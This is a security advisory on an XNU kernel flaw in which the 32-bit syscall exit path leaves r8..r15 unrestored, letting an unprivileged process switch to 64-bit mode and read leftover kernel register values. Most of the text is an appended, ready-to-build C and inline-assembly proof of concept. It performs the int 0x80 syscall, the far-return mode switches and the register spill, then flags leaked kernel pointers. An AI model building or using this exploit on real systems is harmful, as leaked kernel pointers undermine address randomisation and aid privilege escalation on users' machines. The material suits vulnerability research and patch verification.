XNU Kernel 32-bit Binary Syscall Return Path Vulnerability
The XNU kernel, when compiled for an x86-64 CPU, can run 32-bit x86 binaries in compatibility mode. 32-bit binaries use partly separate syscall entry and exit paths. To return to userspace, unix_syscall() in bsd/dev/i386/systemcalls.c calls thread_exception_return() (in osfmk/x86_64/locore.s), which in turn calls return_from_trap, implemented in osfmk/x86_64/idt64.s. return_from_trap() normally branches into return_to_user fairly quickly, which then, depending on the stack segment selector, branches into either L_64bit_return or L_32bit_return.

While the L_64bit_return path restores all userspace registers, the L_32bit_return path only restores the registers that are accessible in compatibility mode; r8 to r15 are not restored and still hold whatever the kernel last left in them. This is a problem because switching to compatibility mode only makes r8..r15 inaccessible, it does not clear them: their contents are preserved across the mode switch, and switching back to 64-bit mode makes them readable again. Nothing stops an unprivileged process from performing that switch itself, since the 64-bit user code segment is a ring 3 segment that any user thread may load.

An unprivileged 32-bit process can therefore leak kernel register contents as follows: make a normal 32-bit syscall, switch to 64-bit mode (e.g. by loading the 64-bit user code segment using iret or a far jump/return), store the contents of r8..r15, and switch back to compatibility mode (e.g. by loading the 32-bit user code segment the same way). The values obtained this way are whatever the kernel had in r8..r15 at the moment it returned to userspace, which can include kernel pointers and other kernel data.
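The four-step procedure above, written out as an added example (this is not code from the advisory and not XNU code). A 32-bit macOS program issues getpid, far-returns into the 64-bit user code segment, spills r8..r15 and far-returns back; the classifier helpers around it are portable and flag values that fall into XNU's kernel address window. Assumptions that are not in the text: the GDT selectors USER_CS = 0x1b and USER64_CS = 0x2b (from osfmk/i386/seg.h), SYS_getpid = 20 reached through int 0x80, the x86_64 kernel VA window 0xffffff8000000000..0xfffffffffffffeff, and the use of lret rather than iret for the mode switches. The sample_dump array is constructed for illustration, not captured from a real kernel.

```c
/* Added example; not part of the original advisory and not XNU code.
 * Assumptions: USER_CS = 0x1b, USER64_CS = 0x2b (XNU osfmk/i386/seg.h),
 * SYS_getpid = 20 via int 0x80, and XNU's x86_64 kernel VA window.
 * Build on a macOS release that still runs 32-bit code: clang -m32 leak32.c */
#include <stdint.h>
#include <stdio.h>

#define NREGS 8                                  /* r8..r15 */
#define XNU_VM_MIN_KERNEL_ADDRESS 0xFFFFFF8000000000ULL
#define XNU_VM_MAX_KERNEL_ADDRESS 0xFFFFFFFFFFFFEFFFULL

/* Heuristic: a value inside the kernel VA window is treated as a leaked
 * kernel pointer; -1 and small integers (kernel scratch values) are not. */
int looks_like_kernel_pointer(uint64_t v) {
    return v >= XNU_VM_MIN_KERNEL_ADDRESS && v <= XNU_VM_MAX_KERNEL_ADDRESS;
}

/* How many of the spilled registers look like kernel pointers. */
int count_kernel_pointers(const uint64_t regs[NREGS]) {
    int n = 0;
    for (int i = 0; i < NREGS; i++)
        n += looks_like_kernel_pointer(regs[i]);
    return n;
}

/* Index (0 = r8 ... 7 = r15) of the first kernel pointer, or -1 if none. */
int first_kernel_pointer(const uint64_t regs[NREGS]) {
    for (int i = 0; i < NREGS; i++)
        if (looks_like_kernel_pointer(regs[i]))
            return i;
    return -1;
}

/* Constructed sample dump (made up, not captured from a real kernel): two
 * kernel pointers, a small counter, a -1 and zeros, as a leak might look. */
const uint64_t sample_dump[NREGS] = {
    0xffffff8012345678ULL, 0x0000000000000007ULL, 0xffffffffffffffffULL,
    0xffffff80009a0000ULL, 0, 0, 0x00000000deadbeefULL, 0,
};

#if defined(__i386__) && defined(__APPLE__)
/* Step 1: getpid through int 0x80, so the kernel exits via L_32bit_return.
 * Step 2: far return into USER64_CS. Step 3: spill r8..r15 through the
 * 32-bit pointer held in esi. Step 4: far return into USER_CS. Target
 * addresses are computed with call/pop, so no absolute relocations are
 * needed and the code also works inside a PIE. */
void read_leaked_regs(uint64_t out[NREGS]) {
    __asm__ __volatile__(
        "movl  $20, %%eax\n\t"          /* SYS_getpid, no arguments */
        "int   $0x80\n\t"
        "call  0f\n"
        "0:\n\t"
        "popl  %%edx\n\t"
        "addl  $(1f-0b), %%edx\n\t"     /* edx = address of label 1 */
        "pushl $0x2b\n\t"               /* USER64_CS */
        "pushl %%edx\n\t"
        "lret\n"                        /* enter long mode at label 1 */
        ".code64\n"
        "1:\n\t"
        "movl  %%esi, %%esi\n\t"        /* zero-extend pointer and stack */
        "movl  %%esp, %%esp\n\t"
        "movq  %%r8,   0(%%rsi)\n\t"
        "movq  %%r9,   8(%%rsi)\n\t"
        "movq  %%r10, 16(%%rsi)\n\t"
        "movq  %%r11, 24(%%rsi)\n\t"
        "movq  %%r12, 32(%%rsi)\n\t"
        "movq  %%r13, 40(%%rsi)\n\t"
        "movq  %%r14, 48(%%rsi)\n\t"
        "movq  %%r15, 56(%%rsi)\n\t"
        "call  2f\n"
        "2:\n\t"
        "popq  %%rdx\n\t"
        "addq  $(3f-2b), %%rdx\n\t"     /* rdx = address of label 3 */
        "pushq $0x1b\n\t"               /* USER_CS */
        "pushq %%rdx\n\t"
        "lretq\n"                       /* back to compatibility mode */
        ".code32\n"
        "3:\n\t"
        : : "S"(out) : "eax", "ecx", "edx", "memory", "cc");
}

int main(void) {
    uint64_t regs[NREGS] = {0};
    read_leaked_regs(regs);
    for (int i = 0; i < NREGS; i++)
        printf("r%-2d = 0x%016llx%s\n", 8 + i, (unsigned long long)regs[i],
               looks_like_kernel_pointer(regs[i]) ? "  <- kernel pointer?" : "");
    printf("%d of %d registers look like kernel pointers\n",
           count_kernel_pointers(regs), NREGS);
    return 0;
}
#endif
```

The mode switch itself is only compiled for a 32-bit Apple target, so the helpers can be built and exercised anywhere; on an affected kernel the printed dump should contain values in the 0xffffff80... range right after the syscall, and on a kernel that clears or restores r8..r15 on the 32-bit exit path it should not.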